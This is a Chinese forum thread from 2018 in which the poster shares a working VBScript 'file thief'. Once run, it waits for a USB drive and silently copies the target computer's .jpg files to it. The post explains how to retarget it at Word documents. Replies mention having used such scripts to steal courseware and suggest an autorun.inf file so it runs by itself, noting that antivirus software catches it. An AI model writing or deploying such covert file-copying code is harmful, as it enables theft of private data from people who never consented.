极客工坊

 找回密码
 注册

QQ登录

只需一步,快速开始

查看: 27077|回复: 8

用vbs制作文件“小偷”

[复制链接]
发表于 2018-8-6 15:06:17 | 显示全部楼层 |阅读模式
所谓“文件‘小偷’”,是指当U盘插入某台电脑时,会自动在该台电脑指定的目录或所有盘符下搜索指定扩展名的文件,并隐蔽地拷贝到U盘中来,达到“偷文件”的目的。 程序很简单,只需将以下程序拷贝到记事本中,并另存为XXX.vbs的文件,双击即可运行,此时插入U盘,一会D盘中的jpg文件就在不声不响中被拷贝到U盘中来喽。需要注意的是:以下程序示例的是搜索并拷贝D盘下扩展名为jpg的文件,使用时可根据需要自行修改。比如,要搜索并拷贝电脑中的WORD文档,则将 ExecQuery("Select * from CIM_DataFile where drive='d:' and Extension = 'jpg'")修改为 ExecQuery("Select * from CIM_DataFile where  Extension = 'doc' or Extension = 'docx'  "),是不是很简单呢!

Const Configuration_Changed = 1
Const Device_Arrival = 2
Const Device_Removal = 3
Const Docking = 4
Set fso = CreateObject("Scripting.FileSystemObject")
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colFiles = objWMIService. _
    ExecQuery("Select * from CIM_DataFile where drive='d:' and Extension = 'jpg'")
Set colMonitoredEvents = objWMIService. _
    ExecNotificationQuery( _
        "Select * from Win32_VolumeChangeEvent")
Do
    Set objLatestEvent = colMonitoredEvents.NextEvent
    Select Case objLatestEvent.EventType
            Case Device_Arrival
                    'WScript.Echo "U盘插入,盘符为" & objLatestEvent.DriveName               
                  For Each objFile in colFiles
                   'fso.CopyFile objFile.Name,objLatestEvent.DriveName & "\",False
                     msgstr=msgstr &  Chr(13) & Chr(10) & objFile.Name
                     'msgbox InStr(objFile.Name,"$") &  Chr(13) & Chr(10) & objFile.Name
                     '以下防止拷贝到临时文件
                     if InStr(objFile.Name,"$")=0  then
                       fso.CopyFile objFile.Name,objLatestEvent.DriveName & "\",False
                     end if
                  Next
             ' msgbox msgstr                     '显示搜索到的文件列表
              'msgbox objLatestEvent.DriveName   '显示U盘盘符

            Case Device_Removal
                    WScript.Echo "U盘弹出,盘符为" & objLatestEvent.DriveName
        End Select
Loop
回复

使用道具 举报

发表于 2018-8-6 20:35:53 | 显示全部楼层
哇,厉害厉害厉害

回复 支持 反对

使用道具 举报

发表于 2018-8-7 08:25:23 | 显示全部楼层
这。。。还能这样
回复 支持 反对

使用道具 举报

发表于 2018-8-7 09:44:12 | 显示全部楼层
嗯,当年用这种程序偷课件
回复 支持 反对

使用道具 举报

发表于 2018-8-7 11:15:35 | 显示全部楼层
只需将以下程序拷贝到记事本中,并另存为XXX.vbs的文件,双击即可运行,此时插入U盘,一会D盘中的jpg文件就在不声不响中被拷贝到U盘中来喽。
====
1、得先知道目标电脑的文件/文件夹情况
2、得先在目标电脑上运行.vbs程序

--有没有插入U盘,自动执行的呢?
回复 支持 反对

使用道具 举报

发表于 2018-8-9 21:19:44 | 显示全部楼层
这个脚本是要手动运行的。可以编制autorun.inf自动触发。但有360就行不通了,会马上警告。
回复 支持 反对

使用道具 举报

 楼主| 发表于 2018-8-11 16:28:21 | 显示全部楼层
asdfcgdc 发表于 2018-8-9 21:19
这个脚本是要手动运行的。可以编制autorun.inf自动触发。但有360就行不通了,会马上警告。

回复 支持 反对

使用道具 举报

发表于 2018-9-21 14:06:51 | 显示全部楼层
试过双击无反应
回复 支持 反对

使用道具 举报

 楼主| 发表于 2018-9-22 07:59:46 | 显示全部楼层

双击运行后,插入U盘,过一会,你会发现U盘里有了你想要的文件。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则 需要先绑定手机号

Archiver|联系我们|极客工坊

GMT+8, 2024-3-29 15:00 , Processed in 0.044399 second(s), 24 queries .

Powered by Discuz! X3.4 Licensed

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表